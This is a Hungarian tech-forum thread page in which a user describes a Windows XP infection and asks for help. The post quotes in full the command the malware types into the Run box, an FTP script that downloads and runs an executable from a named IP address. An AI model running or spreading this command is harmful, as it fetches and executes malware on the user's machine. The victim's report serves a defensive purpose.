Hirdetés
- sziku69: Szólánc.
- sziku69: Fűzzük össze a szavakat :)
- Luck Dragon: Asszociációs játék. :)
- eBay-es kütyük kis pénzért
- D1Rect: Nagy "hülyétkapokazapróktól" topik
- D@reeo: Pi-hole és a Telekom Sagemcom F@st 5670 DNS beállítása
- Brogyi: CTEK akkumulátor töltő és másolatai
- Sub-ZeRo: Euro Truck Simulator 2 & American Truck Simulator 1 (esetleg 2 majd, ha lesz) :)
- bb0t: Ikea PAX gardrób és a pokol logisztikája
- GoodSpeed: A RAM-válság és annak lehetséges hatásai
Új hozzászólás Aktív témák
-
válasz
BlacKSouL
üzenetére
Köszönöm a segítséget,szerencsére úgy néz ki, hogy csak alaposan benéztem a dolgokat.
A Google találatok alapján -amit Te is belinkeltél-, kiderült, hogy az általam használt RealVnc 4.1.1 bugjáról van szó, ami az újabb verzió telepítésével kiküszöbölhető. Telepítettem az újabb verziót, és úgy tűnik, valóban megszünt a jelenség.
Még egyszer köszi,
lrigo
[Szerkesztve] -
Sziasztok!
Összeszedtem valami trükkös dolgot, légyszi segítsetek! Véletlenszerű időközönként felugrik a futtatás ablak, majd mint ha gépelném, beíródik a következő parancs:
cmd /c echo OPEN 193.226.255.233 29248>x&echo GET 84785_redworld2.exe>>x&echo QUIT>>x&FTP -n -s:x&84785_redworld2.exe&del x&exit Ezt követően felugrik a command ablak, és ott megpróbál lefutni az utasítás, de szerencsére hibaüzenettel megáll...
Amit eddig próbáltam: kikapcsolt rendszervisszaállítás mellett, csökkentett módban futtattam a Spybot, Adaware, Ccleaner és a RegClean progikat, töröltem a böngésző előzményeket, sütiket. (WinXP SP2 prof. + frissítések, Opera és Firefox böngésző)
Google keresésre nem találtam számomra értékelhető választ.
Köszi,
lrigo
[Szerkesztve]
Új hozzászólás Aktív témák
- A fociról könnyedén, egy baráti társaságban
- One mobilszolgáltatások
- Házimozi belépő szinten
- Napelem
- Számtech boltosok memoárjai, azaz amikor kiborulunk...
- Mennyibe fog kerülni a Steam Machine?
- Kuponkunyeráló
- Intel Core i7-5xxx "Haswell-E/EP" és i7-6xxx "Broadwell-E/EP" (LGA2011-v3)
- Samsung Galaxy A55 - új év, régi stratégia
- Kerékpárosok, bringások ide!
- További aktív témák...
- Vírusirtó, Antivirus, VPN kulcsok
- Számlás!Steam,EA,Epic és egyébb játékok Pc-re vagy XBox!
- BLACK FRIDAY! - Jogtiszta Windows - Office & Vírusirtó licencek- Azonnal - Számlával - Garanciával
- Árváltozás: Deus Ex Human Revolution Collector's Edition
- Bitdefender Total Security 3év/3eszköz! - Tökéletes védelem, Most Ünnepi áron! :)
- Telefon felvásárlás!! Xiaomi Redmi 9, Xiaomi Redmi 9AT, Xiaomi Redmi 10, Xiaomi Redmi 10 2022
- LG 27US550-W - 27" IPS / 3840x2160 4K / 60Hz 5ms / HDR10 / Forgatható / sRGB 99%
- Apple iPhone 14 pro 128GB,Újszerű,Dobozával, 12 hónap garanciával
- BESZÁMÍTÁS! Asus H370-A i5 9600K 16GB DDR4 512GB SSD RTX 2060 Super 8GB Zalman T7 Zalman 500W
- HIBÁTLAN iPhone 15 Pro 128GB Blue Tianium -1 ÉV GARANCIA - Kártyafüggetlen, MS3909, 100% Akkumulátor
Állásajánlatok
Cég: BroadBit Hungary Kft.
Város: Budakeszi
Cég: PCMENTOR SZERVIZ KFT.
Város: Budapest